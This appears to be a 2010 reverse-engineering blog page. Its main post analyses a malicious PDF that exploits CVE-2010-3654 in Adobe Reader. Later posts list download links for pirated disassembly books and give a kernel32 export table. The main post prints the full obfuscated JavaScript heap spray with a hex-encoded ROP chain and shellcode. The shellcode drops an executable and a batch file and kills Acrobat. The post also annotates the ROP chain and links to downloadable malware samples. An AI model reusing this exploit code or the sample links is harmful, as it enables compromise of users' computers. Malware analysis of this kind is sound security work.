Showing posts with label reverse engineering. Show all posts
Showing posts with label reverse engineering. Show all posts

Saturday, November 27, 2010

CVE-2010-3654

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3654

des :

Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris and 10.1.95.1 on Android, and authplay.dll (aka AuthPlayLib.bundle or libauthplay.so.0.0.0) in Adobe Reader and Acrobat 9.x through 9.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via crafted SWF content, as exploited in the wild in October 2010.


---

pdf file (uncompressed)

PDF Comment %PDF-1.7



PDF Comment %âãÏÓ




obj 26 0

 Type:

 Referencing:


<</Linearized 1/L 241680/O 29/E 6094/N 1/T 241354/H [ 513 208]>>



 <<

   /Linearized 1

   /L 241680

   /O 29

   /E 6094

   /N 1

   /T 241354

   /H [ 513 208]

 >>



<</Linearized 1/L 241680/O 29/E 6094/N 1/T 241354/H [ 513 208]>>



obj 37 0

 Type: /XRef

 Referencing: 25 0 R, 27 0 R

 Contains stream


<</DecodeParms<</Columns 4/Predictor 12>>/Filter/FlateDecode/ID[<BFEF0C62A7E9A94FAAEC52A3E6C8279A><CF478FAC136BCC4BA27379A9D0BF1937>]/Index[26 47]/Info 25 0 R/Length 66/Prev 241355/Root 27 0 R/Size 73/Type/XRef/W[1 2 1]>>


 <<

   /DecodeParms /Columns 4

   /Predictor 12

 >>


  </pre>


pdf file (compressed)

%PDF-1.7

%âãÏÓ

26 0 obj

<</Linearized 1/L 241680/O 29/E 6094/N 1/T 241354/H [ 513 208]>>

endobj

               

37 0 obj

<</DecodeParms<</Columns 4/Predictor 12>>/Filter/FlateDecode/ID[<BFEF0C62A7E9A94FAAEC52A3E6C8279A><CF478FAC136BCC4BA27379A9D0BF1937>]/Index[26 47]/Info 25 0 R/Length 66/Prev 241355/Root 27 0 R/Size 73/Type/XRef/W[1 2 1]>>stream

hÞbbd ``b`: $ 

----

virus total analyse

Antivirus     Version     Last Update     Result

AhnLab-V3     2010.11.02.00     2010.11.01     PDF/Cve-2010-3654

AntiVir     7.10.13.77     2010.11.01     -

Antiy-AVL     2.0.3.7     2010.11.01     Exploit/Win32.CVE-2010-3654

Authentium     5.2.0.5     2010.11.01     -

Avast     4.8.1351.0     2010.11.01     JS:Pdfka-gen

Avast5     5.0.594.0     2010.11.01     JS:Pdfka-gen

AVG     9.0.0.851     2010.11.02     Exploit_c.NLK

BitDefender     7.2     2010.11.02     Exploit.PDF-JS.Gen

CAT-QuickHeal     11.00     2010.10.26     -

ClamAV     0.96.2.0-git     2010.11.02     BC.PDF.Parser-4.MalwareFound

Comodo     6583     2010.11.01     -

DrWeb     5.0.2.03300     2010.11.02     -

Emsisoft     5.0.0.50     2010.11.02     Exploit.Win32.CVE-2010-3654!IK

eSafe     7.0.17.0     2010.11.01     -

eTrust-Vet     36.1.7948     2010.11.01     PDF/CVE-2010-3654!exploit

F-Prot     4.6.2.117     2010.11.01     W32/Heuristic-XEN!Eldorado

F-Secure     9.0.16160.0     2010.11.02     Exploit:W32/Pidief.CSR

Fortinet     4.2.249.0     2010.11.01     JS/Agent.FSH!exploit

GData     21     2010.11.02     Exploit.PDF-JS.Gen

Ikarus     T3.1.1.90.0     2010.11.02     Exploit.Win32.CVE-2010-3654

Jiangmin     13.0.900     2010.11.01     -

K7AntiVirus     9.67.2882     2010.11.01     -

Kaspersky     7.0.0.125     2010.11.01     Exploit.Win32.CVE-2010-3654.a

McAfee     5.400.0.1158     2010.11.02     -

McAfee-GW-Edition     2010.1C     2010.11.01     Heuristic.BehavesLike.PDF.Suspicious.O

Microsoft     1.6301     2010.11.01     Exploit:Win32/Pdfjsc.gen!A

NOD32     5583     2010.11.01     JS/Exploit.Pdfka.OKB

Norman     6.06.10     2010.11.01     JS/CVE-2010-3654.A

nProtect     2010-11-01.01     2010.11.01     Exploit.PDF-JS.Gen

Panda     10.0.2.7     2010.11.01     Exploit/PDF.Flash.A

PCTools     7.0.3.5     2010.11.02     Trojan.Pidief

Prevx     3.0     2010.11.02     -

Rising     22.71.06.04     2010.11.01     -

Sophos     4.59.0     2010.11.02     Troj/SWFLdr-V

Sunbelt     7190     2010.11.02     Exploit.PDF-JS.Gen (v)

SUPERAntiSpyware     4.40.0.1006     2010.11.02     -

Symantec     20101.2.0.161     2010.11.02     Trojan.Pidief

TheHacker     6.7.0.1.075     2010.11.02     -

TrendMicro     9.120.0.1004     2010.11.01     TROJ_PIDIEF.WV

TrendMicro-HouseCall     9.120.0.1004     2010.11.02     TROJ_PIDIEF.WV

VBA32     3.12.14.1     2010.11.01     -

ViRobot     2010.10.4.4074     2010.11.01     PDF.S.Exploit.241679

VirusBuster     12.70.15.0     2010.11.01     -

PEiD: -

packers (F-Prot): XORCrypt

packers (Kaspersky): Swf2Swc

PDFiD:

PDF Header: %PDF-1.7

obj 22

endobj 22

stream 19

endstream 19

xref 0

trailer 0

startxref 2

/Page 1

/Encrypt 0

/ObjStm 5

/JS 0

/JavaScript 0

/AA 0

/OpenAction 0

/AcroForm 0

/JBIG2Decode 0

/RichMedia 0

/Colors > 2^24 0

}

document information

content/type: PDF document, version 1.7

Object 4.0 @ 12391: suspicious.flash Embedded Flash

Object 4.0 @ 12391: flash.exploit CVE-2010-3654

Object 28.0 @ 945: suspicious.obfuscation using unescape

Object 28.0 @ 945: suspicious.string heap spray shellcode

Object 35.0 @ 4944: suspicious.flash Adobe Shockwave Flash in a PDF define obj type



---

now about exploit

first :

this is curvedPolygon.
function drawLines():void {

var i:int;

var n:int = vecPoints.length;

var vecCmds:Vector.<int> = new Vector.<int>();

var vecCoords:Vector.<Number> = new Vector.<Number>();

for(i=0; i<n; i++) {

vecCoords[2*i] = vecPoints[i].x;

vecCoords[2*i+1] = vecPoints[i].y;

}

vecCoords[2*n] = vecPoints[0].x;

vecCoords[2*n+1] = vecPoints[0].y;

for(i=0; i<=(n/2); i++) {

vecCmds[i] = 3; // This line creates "curveTo" commands

}

vecCmds[0] = 1;

shLines.graphics.clear();

shLines.graphics.lineStyle(1,0);

shLines.graphics.beginFill(0xFF0000);

shLines.graphics.drawPath(vecCmds, vecCoords,vecWind[rbgWind.selectedData]);

shLines.graphics.endFill();

} </pre>


source code of heap spray

var p = unescape;

var len = "\x6c\x65\x6e\x67\x74\x68";

var s2 = "\x73\x75\x62\x73\x74\x72\x69\x6e\x67";

var s3 = "\x73\x75\x62\x73\x74\x72";

function a(__){var _='';for(var ___=0;___<__[len];___+=4) _+='%'+'u'+__[s3](___,4);return _;}

function s()

{

c=p(a("58585858"));

while(c[len] + 20 + 8 < 0x10000) c = c + c;

b = c[s2](0,(0x5858-0x24)/2);

b += p(a("585858582fe10700deadbeefb00bface5868585849190700cccccccc48ef0700156f0700cccccccc90840700908407009084070090840700908407009084070090330700908407000c0c0c0c9084070090840700908407009084070090840700908407009084070090840700159907000124000172f707000104000115bb070010000000154d070015bb070003007ffe7fb2070015bb070000110001a8ac070015bb070001000001a8ac070072f707000011000152e207005c540700ffffffff0100000100000000010400011000000000400000d731070015bb0700905a9054154d0700a722070015bb0700eb5a5815154d0700a722070015bb07001a8b1889154d0700a722070015bb0700c0838304154d0700a722070015bb070004c2fb81154d0700a722070015bb07000c0c0c0c154d0700a722070015bb0700ee7505eb154d0700a722070015bb0700e6e8ffff154d0700a722070015bb070090ff9090154d0700a722070015bb070090909090154d0700a722070015bb070090909090154d0700a722070015bb0700ffff90ff154d0700d7310700112f0700909090902FE90005C300C08BD23302EB4240388075008BF9C3C2C08B8951240404EB088842400A8AC984F67500C68B002404C35A575601BE00003B0072D6300846083B4073D68BF85FC7C35E8B6430050000850078C08B0E0C40408B8B148B008B0010408BC33440808B00B8000090C33351EBD28B16C1CA03E1E183C1FF1DEACA0BD233108ACA33D18B80400038E57514898B242404C35A8B5583ECE4C456538B57085D458B890CFC45C38B81664D380F5AC28500008B003C40C30345898BF4F445388145500000850F00AB0000458B83F478C038830F009C840000830004780F00928400008B00F455528B8B7803C389D0F055558B83F0187A74008B7CF055528B032089D0E855558B8BF02452D00355898BECF055528B031C89D0E455458B8BF01878854F72FF4750F633458B8BE8B004C30337E8FFFF3BFF0C4537757D8300101D74458B8910F845458B0FEC04B78B70F05542035010FF53F8554589EBFC8B18EC45B70F7004558B8BE48204C3034589EBFC4604754F8BB3FC455E5F8B5B5DE50CC28D000040895124040CEB8040223806758940240405EB388075008BEF2404C35A8951240409EBF9807422880A40088A42840A75C9C6F10000048B5A248DC30040C4838DF82454330489C9240C028902EB02FF0A8B39807500EBF78B13800A5C390A75028B0489FF24240406EB0AFF023BE976048B5924C35A56535157F98BD88B006A806800006A006A026A00680200004000FF521253F08B006A006A006AFF562E53006A448D04248B50E8C7FDD8FFFF5750FF561653FF5622535F5A5B5E90C356535557C481FC58FFFF4C890424F28B04898B24241C7C83042475008D232444501804680001FF002A53448D18048B50E8C6FF4AFFFFD08BE858FD9AFFFF1CEB448D182468500104000053FF8D2A04448B182414C283E869FD7CFFFF006A806800006A006A036A00680100008000FF561253F08B006A806800006A006A026A00680200004000448D3024FF501253E88BFF337C83042475016A0E6A008B004E43565053FFEB2E6A0F6A008B004E4343035052FF562E53006A006A006AFF552E53448B0424E88372010F57BB8500006A008D0024445018906800018D00248401240000565053FF8D1A2484011800004B8ABA5601900000F5E8FFFC6AFF8D0024445018906800018D00248401240000555053FF811690C700013B00527BB1726AEB006A006A7568008A560053FF6A2E8D0024445018046A448D1824565053FF6A1A6A008B004E4343035052FF562E53006A448D18246A508D012444501CFF561A53448D10244B8ABA56000100007FE8FFFC6AFF8D0024445018016A448D1C24555053FF47167C3B0C24C472FF562253FF552253448B0424E88372010F0B90840000E900009F0000538D8D74248402A8000023E8FFFC8DFF74430BE8FFFC8DFF048402A80000548D18240BE8FFFC8DFF7443F3E8FFFB8BFF8DF02444E818FBE8FFFFF003848DA83400028D00CA930000E800FBE4FFFF448D182468500104000053FF8D2A04448D185F53CBE8FFFB8DFF248C02A80000548D1824048BE824FD98FFFF006A448D1C24FF502653006A53FFEB366A146A016A008D0024445024438D505A006A53FF8A4624448108A8C400035D005E5FC35B56535557C4838DF4246CC60424048B00E8D8FB9EFFFFF88B006A438B500EE857FBDCFFFFF08B7389850E74F65667438B500AE857FBC8FFFF4389830A0A7B74008D5301434589EB008B42004523E8FFFB89FF24448B080045FF500A53F88B448B08240140004514EB438B500E57568DE8FFFB8BFF0055028945830400458B8B00853075F683E30045FE04800B003BB97704C60124048A83240CC45F5D5B5E90C38B5581EC00C4FFFEE8FF000000002D583E4600404589B8FC3EAC0040450389FCF845458BE8F8FF36FFFFC0844074458BFFF8325017E8FFFCE8FFFC12FFFFD08B858DFE03FFFF21E8FFFC8DFF0395FFFEB9FF00010000458BE8F8FCAEFFFF958DFE03FFFFC933458BE8F8FC9EFFFFE58BC35DC08B6B027265656E336C0032FD89A4129B84F2502A7A38C6C54558D855450BE2EFE79554D616C0D6F74B016EDC95B929FD70A9D123B7C8AF2CB9E6FF0000000068736C65336C003241934574000000008A70000058000002007B0000706F6E657E006574706D622E74617E00652E65780000000000006970676E31203732302E302E312E2D20206E2033202661746B73696B6C6C2F206D6941207263626F7461652E65782F202066202661746B73696B6C6C2F206D6941207263526F33642E3278652065662F26202220000000220000909090900c900c0c0c0c"));

b += c;

d = b[s2](0,0x10000/2);

e = c[s2](0,0x8000-(0x1020-0x08)/2);

while(d[len] < 0x80000) d+=d;

_3 = d[s2](0,0x80000-(0x1020-0x08)/2);

_4= new Array();

_5 =    new Array();

for(i=0;i<0x300;i=i+1)

for(j=0;j<16;j++)

 _5[i*16+j]=e+"y";


for(i=0;i<0x300;i=i+1)

for(j=0;j<15;j++)

 _5[i*16+j]=null;



for(i=0;i<0x280;i=i+1)    _4[i]                =_3        + "s";

}

s(); 
}


exploit use rop technology 

58585854   58585858

58585858   07002FE1  BIB.07002FE1

5858585C   BEEFDEAD

58585860   FACEB00B

58585864   58585868

58585868   07004919  BIB.07004919

5858586C   CCCCCCCC

58585870   070048EF  BIB.070048EF   

58585874   0700156F  BIB.0700156F

58585878   CCCCCCCC

5858587C   07009084  BIB.07009084

58585880   07009084  BIB.07009084

58585884   07009084  BIB.07009084

58585888   07009084  BIB.07009084

5858588C   07009084  BIB.07009084

58585890   07009084  BIB.07009084

58585894   07009033  BIB.07009033

58585898   07009084  BIB.07009084

5858589C   0C0C0C0C 

585858A0   07009084  BIB.07009084

585858A4   07009084  BIB.07009084

585858A8   07009084  BIB.07009084

585858AC   07009084  BIB.07009084

585858B0   07009084  BIB.07009084

585858B4   07009084  BIB.07009084

585858B8   07009084  BIB.07009084

585858BC   07009084  BIB.07009084

585858C0   07001599  BIB.07001599

585858C4   00010124  UNICODE "Q:="

585858C8   070072F7  BIB.070072F7

585858CC   00010104  UNICODE "=N:="

585858D0   070015BB  BIB.070015BB

585858D4   00001000

585858D8   0700154D  BIB.0700154D

585858DC   070015BB  BIB.070015BB

585858E0   7FFE0300

585858E4   07007FB2  BIB.07007FB2

585858E8   070015BB  BIB.070015BB

585858EC   00010011

585858F0   0700A8AC  BIB.0700A8AC

585858F4   070015BB  BIB.070015BB

585858F8   00010100

585858FC   0700A8AC  BIB.0700A8AC

58585900   070072F7  BIB.070072F7

58585904   00010011

58585908   070052E2  BIB.070052E2

5858590C   07005C54  BIB.07005C54

58585910   FFFFFFFF

58585914   00010100

58585918   00000000

5858591C   00010104  UNICODE "=N:="

58585920   00001000

58585924   00000040

58585928   0700D731  BIB.0700D731

5858592C   070015BB  BIB.070015BB

58585930   9054905A

58585934   0700154D  BIB.0700154D

58585938   0700A722  BIB.0700A722

5858593C   070015BB  BIB.070015BB

58585940   5815EB5A 

58585944   0700154D  BIB.0700154D

58585948   0700A722  BIB.0700A722

5858594C   070015BB  BIB.070015BB

58585950   18891A8B

58585954   0700154D  BIB.0700154D

58585958   0700A722  BIB.0700A722

5858595C   070015BB  BIB.070015BB

58585960   8304C083

58585964   0700154D  BIB.0700154D

58585968   0700A722  BIB.0700A722

5858596C   070015BB  BIB.070015BB

58585970   FB8104C2

58585974   0700154D  BIB.0700154D

58585978   0700A722  BIB.0700A722

5858597C   070015BB  BIB.070015BB

58585980   0C0C0C0C 

58585984   0700154D  BIB.0700154D

58585988   0700A722  BIB.0700A722

5858598C   070015BB  BIB.070015BB

58585990   05EBEE75 

58585994   0700154D  BIB.0700154D

58585998   0700A722  BIB.0700A722

5858599C   070015BB  BIB.070015BB

585859A0   FFFFE6E8

585859A4   0700154D  BIB.0700154D

585859A8   0700A722  BIB.0700A722

585859AC   070015BB  BIB.070015BB

585859B0   909090FF

585859B4   0700154D  BIB.0700154D

585859B8   0700A722  BIB.0700A722

585859BC   070015BB  BIB.070015BB

585859C0   90909090

585859C4   0700154D  BIB.0700154D

585859C8   0700A722  BIB.0700A722

585859CC   070015BB  BIB.070015BB

585859D0   90909090

585859D4   0700154D  BIB.0700154D

585859D8   0700A722  BIB.0700A722

585859DC   070015BB  BIB.070015BB

585859E0   90FFFFFF

585859E4   0700154D  BIB.0700154D

585859E8   0700D731  BIB.0700D731

585859EC   0700112F  BIB.0700112F

585859F0   90909090

585859F4   00052FE9

585859F8   C08BC300

585859FC   02EBD233

58585A00   38804240 

58585A04   8BF97500

58585A08   C08BC3C2

58585A0C   24048951

58585A10   088804EB

58585A14   0A8A4240

58585A18   F675C984

58585A1C   8B0000C6

58585A20   C35A2404

58585A24   01BE5756  AcroRd_1.01BE5756

58585A28   3B000000 

58585A2C   300872D6 

58585A30   3B404608 

58585A34   8BF873D6

58585A38   C35E5FC7

58585A3C   30058B64 

58585A40   85000000

58585A44   8B0E78C0

58585A48   408B0C40

58585A4C   8B008B14

58585A50   10408B00

58585A54   34408BC3 

58585A58   00B8808B  AcroRd_1.00B8808B

58585A5C   90C30000

58585A60   EBD23351

58585A64   C1CA8B16

58585A68   E18303E1

58585A6C   1DEAC1FF

58585A70   D233CA0B

58585A74   CA33108A

58585A78   8040D18B

58585A7C   E5750038

58585A80   8B241489

58585A84   C35A2404

58585A88   83EC8B55

58585A8C   5653E4C4 

58585A90   085D8B57

58585A94   890C458B

58585A98   C38BFC45

58585A9C   4D388166

58585AA0   C2850F5A

58585AA4   8B000000

58585AA8   C3033C40

58585AAC   8BF44589

58585AB0   3881F445 

58585AB4   00004550

58585AB8   00AB850F  AcroRd_1.00AB850F

58585ABC   458B0000

58585AC0   78C083F4

58585AC4   0F003883

58585AC8   00009C84

58585ACC   04788300 

58585AD0   92840F00

58585AD4   8B000000

58585AD8   528BF455

58585ADC   03C38B78

58585AE0   F05589D0

58585AE4   83F0558B

58585AE8   7400187A

58585AEC   F0558B7C

58585AF0   0320528B

58585AF4   E85589D0

58585AF8   8BF0558B

58585AFC   D0032452

58585B00   8BEC5589

58585B04   528BF055

58585B08   89D0031C

58585B0C   458BE455 

58585B10   18788BF0

58585B14   72FF854F

58585B18   F6334750

58585B1C   8BE8458B

58585B20   C303B004

58585B24   FFFF37E8

58585B28   0C453BFF

58585B2C   7D833775

58585B30   1D740010

58585B34   8910458B

58585B38   458BF845 

58585B3C   04B70FEC

58585B40   F0558B70

58585B44   50104203

58585B48   F855FF53

58585B4C   EBFC4589

58585B50   EC458B18

58585B54   7004B70F

58585B58   8BE4558B

58585B5C   C3038204

58585B60   EBFC4589

58585B64   754F4604

58585B68   FC458BB3

58585B6C   8B5B5E5F

58585B70   0CC25DE5

58585B74   00408D00  AcroRd32.00408D00

58585B78   24048951

58585B7C   80400CEB

58585B80   06752238 

58585B84   24048940

58585B88   388005EB 

58585B8C   8BEF7500

58585B90   C35A2404

58585B94   24048951

58585B98   F98009EB

58585B9C   880A7422

58585BA0   8A424008

58585BA4   75C9840A

58585BA8   0000C6F1

58585BAC   5A24048B 

58585BB0   00408DC3  AcroRd32.00408DC3

58585BB4   8DF8C483

58585BB8   33042454 

58585BBC   240C89C9

58585BC0   02EB0289

58585BC4   0A8B02FF

58585BC8   75003980

58585BCC   8B13EBF7

58585BD0   5C39800A 

58585BD4   028B0A75  xpsp2res.028B0A75

58585BD8   FF240489

58585BDC   06EB2404 

58585BE0   023B0AFF

58585BE4   048BE976

58585BE8   C35A5924

58585BEC   51575653 

58585BF0   D88BF98B

58585BF4   8068006A

58585BF8   6A000000

58585BFC   6A006A02

58585C00   00006802

58585C04   FF524000

58585C08   F08B1253

58585C0C   006A006A

58585C10   FF56006A

58585C14   006A2E53

58585C18   0424448D

58585C1C   E8C78B50

58585C20   FFFFFDD8

58585C24   FF565750

58585C28   FF561653

58585C2C   5F5A2253 

58585C30   90C35B5E

58585C34   55575653 

58585C38   FC58C481

58585C3C   4C89FFFF

58585C40   F28B0424

58585C44   8B240489

58585C48   7C83241C  kernel32.7C83241C

58585C4C   75000424

58585C50   24448D23

58585C54   04685018

58585C58   FF000001

58585C5C   448D2A53 

58585C60   8B501804

58585C64   FF4AE8C6

58585C68   D08BFFFF

58585C6C   FD9AE858

58585C70   1CEBFFFF

58585C74   1824448D

58585C78   01046850  RETURN to AcroRd_1.01046850 from AcroRd_1.0104FC7B

58585C7C   53FF0000 

58585C80   04448D2A

58585C84   24148B18

58585C88   E869C283

58585C8C   FFFFFD7C

58585C90   8068006A

58585C94   6A000000

58585C98   6A006A03

58585C9C   00006801

58585CA0   FF568000

58585CA4   F08B1253

58585CA8   8068006A

58585CAC   6A000000

58585CB0   6A006A02

58585CB4   00006802

58585CB8   448D4000 

58585CBC   FF503024

58585CC0   E88B1253

58585CC4   7C83FF33  kernel32.7C83FF33

58585CC8   75010424

58585CCC   6A006A0E

58585CD0   4E438B00

58585CD4   53FF5650 

58585CD8   6A0FEB2E

58585CDC   8B006A00

58585CE0   43034E43

58585CE4   FF565052

58585CE8   006A2E53

58585CEC   006A006A

58585CF0   2E53FF55

58585CF4   0424448B

58585CF8   7201E883

58585CFC   BB850F57

58585D00   6A000000

58585D04   24448D00

58585D08   90685018

58585D0C   8D000001

58585D10   01242484  AcroRd_1.01242484

58585D14   56500000 

58585D18   8D1A53FF

58585D1C   01182484  ASCII "in control of the screen. Your keyboard and mouse input will now affect the sharer's desktop."

58585D20   4B8A0000

58585D24   0190BA56  AcroRd_1.0190BA56

58585D28   F5E80000

58585D2C   6AFFFFFC

58585D30   24448D00

58585D34   90685018

58585D38   8D000001

58585D3C   01242484  AcroRd_1.01242484

58585D40   55500000 

58585D44   811653FF

58585D48   000190C7

58585D4C   527B3B00 

58585D50   6AEBB172

58585D54   006A006A

58585D58   008A7568

58585D5C   53FF5600 

58585D60   8D006A2E

58585D64   50182444

58585D68   448D046A 

58585D6C   56501824 

58585D70   6A1A53FF

58585D74   8B006A00

58585D78   43034E43

58585D7C   FF565052

58585D80   006A2E53

58585D84   1824448D

58585D88   8D016A50

58585D8C   501C2444 

58585D90   1A53FF56

58585D94   1024448D

58585D98   BA564B8A

58585D9C   00000001

58585DA0   FFFC7FE8

58585DA4   8D006AFF

58585DA8   50182444

58585DAC   448D016A 

58585DB0   55501C24 

58585DB4   471653FF

58585DB8   0C247C3B

58585DBC   FF56C472

58585DC0   FF552253

58585DC4   448B2253

58585DC8   E8830424

58585DCC   0F0B7201

58585DD0   00009084

58585DD4   009FE900  RETURN to AcroRd_1.009FE900 from AcroRd_1.009FF9D6

58585DD8   538D0000 

58585DDC   24848D74

58585DE0   000002A8

58585DE4   FFFC23E8

58585DE8   74438DFF

58585DEC   FFFC0BE8

58585DF0   04848DFF

58585DF4   000002A8

58585DF8   1824548D

58585DFC   FFFC0BE8

58585E00   74438DFF

58585E04   FFFBF3E8

58585E08   8DF08BFF

58585E0C   E8182444

58585E10   FFFFFBE8

58585E14   848DF003

58585E18   0002A834

58585E1C   CA938D00

58585E20   E8000000

58585E24   FFFFFBE4

58585E28   1824448D

58585E2C   01046850  RETURN to AcroRd_1.01046850 from AcroRd_1.0104FC7B

58585E30   53FF0000 

58585E34   04448D2A

58585E38   5F538D18 

58585E3C   FFFBCBE8

58585E40   248C8DFF

58585E44   000002A8

58585E48   1824548D

58585E4C   E824048B

58585E50   FFFFFD98

58585E54   448D006A 

58585E58   FF501C24

58585E5C   006A2653

58585E60   EB3653FF

58585E64   6A016A14

58585E68   8D006A00

58585E6C   50242444 

58585E70   505A438D 

58585E74   53FF006A 

58585E78   24448A46

58585E7C   A8C48108

58585E80   5D000003 

58585E84   C35B5E5F

58585E88   55575653 

58585E8C   8DF4C483

58585E90   C604246C

58585E94   8B002404

58585E98   FB9EE8D8

58585E9C   F88BFFFF

58585EA0   438B006A

58585EA4   E857500E

58585EA8   FFFFFBDC

58585EAC   7389F08B

58585EB0   74F6850E

58585EB4   438B5667

58585EB8   E857500A

58585EBC   FFFFFBC8

58585EC0   830A4389

58585EC4   74000A7B

58585EC8   01438D53  ASCII "@ZU?$less@G@std@@V?$ASAllocator@U?$pair@$$CBGP8Acrobat@AFModel@@AEXABVVal@AFFramework@@@Z@std@@@@$0A@@std@@@std@@"

58585ECC   EB004589

58585ED0   00458B42

58585ED4   FFFB23E8

58585ED8   244489FF

58585EDC   00458B08

58585EE0   0A53FF50

58585EE4   448BF88B

58585EE8   01400824  AcroRd_1.01400824

58585EEC   14EB0045

58585EF0   500E438B

58585EF4   8DE85756

58585EF8   8BFFFFFB

58585EFC   02890055  xpsp2res.02890055

58585F00   04004583 

58585F04   8B00458B

58585F08   75F68530

58585F0C   004583E3

58585F10   800BFE04

58585F14   B977003B

58585F18   012404C6  ASCII "Resolution"

58585F1C   8324048A

58585F20   5F5D0CC4 

58585F24   90C35B5E

58585F28   81EC8B55

58585F2C   FFFE00C4

58585F30   0000E8FF

58585F34   2D580000

58585F38   00403E46  AcroRd32.00403E46

58585F3C   B8FC4589

58585F40   00403EAC  AcroRd32.00403EAC

58585F44   89FC4503

58585F48   458BF845 

58585F4C   FF36E8F8

58585F50   C084FFFF

58585F54   458B4074

58585F58   3250FFF8 

58585F5C   FFFC17E8

58585F60   FC12E8FF

58585F64   D08BFFFF

58585F68   FE03858D

58585F6C   21E8FFFF 

58585F70   8DFFFFFC

58585F74   FFFE0395

58585F78   0001B9FF

58585F7C   458B0000

58585F80   FCAEE8F8

58585F84   958DFFFF

58585F88   FFFFFE03

58585F8C   458BC933 

58585F90   FC9EE8F8

58585F94   E58BFFFF

58585F98   C08BC35D

58585F9C   72656B02

58585FA0   336C656E 

58585FA4   FD890032

58585FA8   9B84A412

58585FAC   2A7AF250

58585FB0   C54538C6

58585FB4   554558D8

58585FB8   EFE70BE2

58585FBC   D6169554

58585FC0   F74BC0D6

58585FC4   DC95016E

58585FC8   FD70B929

58585FCC   23B7A9D1

58585FD0   2CB9C8AF

58585FD4   0000E6FF

58585FD8   68730000

58585FDC   336C6C65 

58585FE0   41930032

58585FE4   00004574

58585FE8   8A700000

58585FEC   58000000 

58585FF0   007B0002

58585FF4   706F0000

58585FF8   7E006E65

58585FFC   706D6574

58586000   7461622E

58586004   652E7E00

58586008   00006578

5858600C   00000000

58586010   676E6970

58586014   37323120 

58586018   302E302E 

5858601C   2D20312E

58586020   2033206E 

58586024   61742026 

58586028   696B6B73

5858602C   2F206C6C

58586030   41206D69

58586034   626F7263  rt3d.626F7263

58586038   652E7461

5858603C   2F206578

58586040   20262066 

58586044   6B736174

58586048   6C6C696B

5858604C   6D692F20

58586050   72634120

58586054   3364526F 

58586058   78652E32

5858605C   662F2065

58586060   22202620  Annots.22202620

58586064   00220000

58586068   90900000

5858606C   0C909090

58586070   0C0C0C0C


shellcode drops in %temp% directory ~.exe , ~temp.bat, pdf named same as pdf

 download files = http://www.mediafire.com/?va3mw7fe5vqygha

----------------

wisp trojan?

https://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Trojan:Win32/Wisp.A

http://www.threatexpert.com/report.aspx?md5=9f0cefe847174185030a1f027b3813ec

http://www.securityhome.eu/malware/malware.php?mal_id=897505004b9a591d6da897.20308017


refrence : news.softpedia.com

Hiding Shellcode in Plain Sight


download link = http://www.mediafire.com/?d4pk15u24aou4a0
pass = e-omidfar.blogspot.com

Friday, November 26, 2010

IDA tut's

download link = http://www.mediafire.com/?w74a6zrb5j4p8gz
pss = e-omidfar.blogspot.com

Disassembling Code - IDA Pro And SoftICE

download link = http://www.mediafire.com/?0zjy3de2hka8tor
pass = e-omidfar.blogspot.com

Hacker Debugging Uncovered





download link = http://www.mediafire.com/?q7u2509iuc2bl7l
pass = e-omidfar.blogspot.com

Debugging Applications For Microsoft. NET And Microsoft Windows


download link = http://www.mediafire.com/?wcgdanwdp1y5bpt
pass = e-omidfar.blogspot.com

ArtOfDisassembly




download link = http://www.mediafire.com/?sz2cj825i52zmkm
pass = e-omidfar.blogspot.com
pages : 1306

Hacker Disassembling Uncovered


download = http://bl4ckh4t.persiangig.com/blog/Hacker%20Disassembling%20Uncovered%20%28A%20List-%202003%29.rar
passwd = e-omidfar.blogspot.com

Reversing Secrets of Reverse Engineering

pages : 619
download = http://bl4ckh4t.persiangig.com/blog/Reversing.%20Secrets%20of%20Reverse%20Engineering%20.rar
pass : e-omidfar.blogspot.com

Reverse Engineering Code with IDA Pro



page = 329
download = http://bl4ckh4t.persiangig.com/blog/Reverse%20Engineering%20Code%20with%20IDA%20Pro.rar

pass : e-omidfar.blogspot.com


Thursday, November 25, 2010

Unpacking/ASPack.2.12

in this video u learn how to unpack aspack2.12
download link : http://bl4ckh4t.persiangig.com/xakep/ASPack.2.12.rar

analyzing malicious code

the chart of analyzing maliciuse code
lang = eng
download article = http://bl4ckh4t.persiangig.com/blog/analyzing.pdf

Kernel32 EAT

->Export Table
Characteristics:        0x00000000

   TimeDateStamp:          0x48025BE1  (GMT: Sun Apr 13 19:15:45 2008)

   MajorVersion:           0x0000

   MinorVersion:           0x0000  -> 0.00

   Name:                   0x00004B8E  ("KERNEL32.dll")

   Base:                   0x00000001

   NumberOfFunctions:      0x000003B9

   NumberOfNames:          0x000003B9

   AddressOfFunctions:     0x00002654

   AddressOfNames:         0x00003538

   AddressOfNameOrdinals:  0x0000441C


   Ordinal RVA        Symbol Name

   ------- ---------- ----------------------------------

   0x0001  0x0000A6D4 "ActivateActCtx"

   0x0002  0x00035505 "AddAtomA"

   0x0003  0x000326D9 "AddAtomW"

   0x0004  0x00071CDF "AddConsoleAliasA"

   0x0005  0x00071CA1 "AddConsoleAliasW"

   0x0006  0x00059382 "AddLocalAlternateComputerNameA"

   0x0007  0x00059266 "AddLocalAlternateComputerNameW"

   0x0008  0x0002BEF9 "AddRefActCtx"

   0x0009  0x00008FF5 "AddVectoredExceptionHandler"

   0x000A  0x00072331 "AllocConsole"

   0x000B  0x0005F61A "AllocateUserPhysicalPages"

   0x000C  0x00035967 "AreFileApisANSI"

   0x000D  0x0002E442 "AssignProcessToJobObject"

   0x000E  0x00072519 "AttachConsole"

   0x000F  0x000571CA "BackupRead"

   0x0010  0x000562B0 "BackupSeek"

   0x0011  0x00057825 "BackupWrite"

   0x0012  0x00016867 "BaseCheckAppcompatCache"

   0x0013  0x0006CDE6 "BaseCleanupAppcompatCache"

   0x0014  0x0006CE6A "BaseCleanupAppcompatCacheSupport"

   0x0015  0x0006CCA1 "BaseDumpAppcompatCache"

   0x0016  0x0006CC1F "BaseFlushAppcompatCache"

   0x0017  0x0001655D "BaseInitAppcompatCache"

   0x0018  0x0002B375 "BaseInitAppcompatCacheSupport"

   0x0019  0x000174D3 "BaseProcessInitPostImport"

   0x001A  0x00038372 "BaseQueryModuleData"

   0x001B  0x000151B0 "BaseUpdateAppcompatCache"

   0x001C  0x000195A3 "BasepCheckWinSaferRestrictions"

   0x001D  0x00037A8F "Beep"

   0x001E  0x00070C9B "BeginUpdateResourceA"

   0x001F  0x00070AF8 "BeginUpdateResourceW"
